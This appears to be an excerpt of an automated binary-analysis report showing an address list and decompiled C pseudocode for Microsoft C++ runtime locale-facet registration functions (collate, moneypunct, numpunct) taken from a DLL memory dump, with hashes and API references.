0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d
0x6e1cf280
0x6e1cf280
0x6e1cf283
0x6e1cf287
0x6e1cf28b
0x6e1cf298
0x6e1cf2a0
0x6e1cf2a2
0x00000000
0x6e1cf2a2
0x6e1cf269
0x6e1cf269
0x00000000
0x6e1cf269
0x6e1cf267
0x6e1cf1da
0x6e1cf1da
0x6e1cf1dd
0x6e1cf1e1
0x6e1cf1e5
0x6e1cf1f2
0x6e1cf1fa
0x6e1cf1fc
0x00000000
0x6e1cf1fc
0x6e1cf1c3
0x6e1cf1c3
0x00000000
0x6e1cf1c3
0x6e1cf1c1
0x6e1cf134
0x6e1cf134
0x6e1cf137
0x6e1cf13b
0x6e1cf13f
0x6e1cf14c
0x6e1cf154
0x6e1cf156
0x00000000
0x6e1cf156
0x6e1cf11d
0x6e1cf11d
0x00000000
0x6e1cf11d
0x6e1cf11b
0x6e1cf08e
0x6e1cf08e
0x6e1cf091
0x6e1cf095
0x6e1cf099
0x6e1cf0a6
0x6e1cf0ae
0x6e1cf0b0
0x00000000
0x6e1cf0b0
0x6e1cf077
0x6e1cf077
0x00000000
0x6e1cf077
0x6e1cf075
0x6e1cefe8
0x6e1cefe8
0x6e1cefeb
0x6e1cefef
0x6e1ceff3
0x6e1cf000
0x6e1cf008
0x6e1cf00a
0x00000000
0x6e1cf00a
0x6e1cefd1
0x6e1cefd1
0x00000000
0x6e1cefd1
0x6e1cefcf

APIs

__EH_prolog3.LIBCMT ref: 6E1CEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEFA2
int.LIBCPMT ref: 6E1CEFB9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CEFDC
std::_Facet_Register.LIBCPMT ref: 6E1CEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF031

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 725c82fe6ecce4b054070eb108035fcdfcf59a9e5d6515e3ad5095ba7d234876
Instruction ID: 1d8e61b1ae91dd48a8c23247fc23a2542eb778439727e38e09123df8f464b2b4
Opcode Fuzzy Hash: 725c82fe6ecce4b054070eb108035fcdfcf59a9e5d6515e3ad5095ba7d234876
Instruction Fuzzy Hash: 3A112C7591051DCBCF01DBD4C854BFEB77AAF64B14F244809E520E7290DF789A84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1DBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t154 - 0x14, 0);
				_t147 =  *0x6e286e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1A161C(0x6e286e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E1C66BA(_t154 - 0x14);
					return E6E1E0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E1DC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t154 - 0x20);
							E6E1E3D74(_t154 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t143, _t147, 0x14);
							E6E1C6653(_t154 - 0x14, 0);
							_t148 =  *0x6e286e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1A161C(0x6e286e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E1C66BA(_t154 - 0x14);
								return E6E1E0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E1DC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t154 - 0x20);
										E6E1E3D74(_t154 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t110, _t144, _t148, 0x14);
										E6E1C6653(_t154 - 0x14, 0);
										_t149 =  *0x6e286e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1A161C(0x6e286e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E1C66BA(_t154 - 0x14);
											return E6E1E0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E1DC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1A1438(_t131);
													E6E1E3D74(_t154 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e22851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e22c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E1DD028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E1E0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E1C6FD3(__eflags, _t145);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e286e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E1C6FD3(__eflags, _t144);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e286e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E1C6FD3(__eflags, _t143);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e286e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBA9B
int.LIBCPMT ref: 6E1DBAB2

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBAD5
std::_Facet_Register.LIBCPMT ref: 6E1DBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBB2A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3f1cd47c6b94290e772520a4b29d801c4eb0de0c8c780c841d37ef3e8c201c5d
Instruction ID: 871425d830d8ca758c1b149f09e5771e32464a45e1ac3515f6095b4040267452
Opcode Fuzzy Hash: 3f1cd47c6b94290e772520a4b29d801c4eb0de0c8c780c841d37ef3e8c201c5d
Instruction Fuzzy Hash: C31159B6910529CBCF01DBE8C844EFEB37ABF55714F180908E010AB290DF749989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t242 - 0x14, 0);
				_t231 =  *0x6e286de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1A161C(0x6e286d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E1C66BA(_t242 - 0x14);
					return E6E1E0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E1D1471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t242 - 0x20);
							E6E1E3D74(_t242 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t225, _t231, 0x14);
							E6E1C6653(_t242 - 0x14, 0);
							_t232 =  *0x6e286dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1A161C(0x6e286da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E1C66BA(_t242 - 0x14);
								return E6E1E0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E1D14EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t242 - 0x20);
										E6E1E3D74(_t242 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t172, _t226, _t232, 0x14);
										E6E1C6653(_t242 - 0x14, 0);
										_t233 =  *0x6e286dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1A161C(0x6e286d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E1C66BA(_t242 - 0x14);
											return E6E1E0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E1D1558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t242 - 0x20);
													E6E1E3D74(_t242 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t172, _t227, _t233, 0x14);
													E6E1C6653(_t242 - 0x14, 0);
													_t234 =  *0x6e286e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1A161C(0x6e286dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E1C66BA(_t242 - 0x14);
														return E6E1E0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E1D15C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t242 - 0x20);
																E6E1E3D74(_t242 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t172, _t228, _t234, 0x14);
																E6E1C6653(_t242 - 0x14, 0);
																_t235 =  *0x6e286dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1A161C(0x6e286d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E1C66BA(_t242 - 0x14);
																	return E6E1E0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E1D162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1A1438(_t207);
																			E6E1E3D74(_t242 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e22851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e22c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E1D542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E1E0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E1C6FD3(__eflags, _t229);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e286dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E1C6FD3(__eflags, _t228);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e286e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E1C6FD3(__eflags, _t227);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e286dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E1C6FD3(__eflags, _t226);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e286dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E1C6FD3(__eflags, _t225);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e286de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFA02
int.LIBCPMT ref: 6E1CFA19

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CFA3C
std::_Facet_Register.LIBCPMT ref: 6E1CFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFA91

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 643dc0711f7aff9a26f820de7d09e7c5509c972a22330bf08c98a56e90f214f5
Instruction ID: 8edfe73c22ec15f3f6cf4f2005e38ae4c26afc13b590589c1f0be27bf3072d77
Opcode Fuzzy Hash: 643dc0711f7aff9a26f820de7d09e7c5509c972a22330bf08c98a56e90f214f5
Instruction Fuzzy Hash: D31136759105298BCF01DBE4C854AFEB37AAF68B04F244809E121E7290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t198 - 0x14, 0);
				_t189 =  *0x6e286e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1A161C(0x6e286e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E1C66BA(_t198 - 0x14);
					return E6E1E0075(_t184);
				} else {
					if(_t189 == 0) {
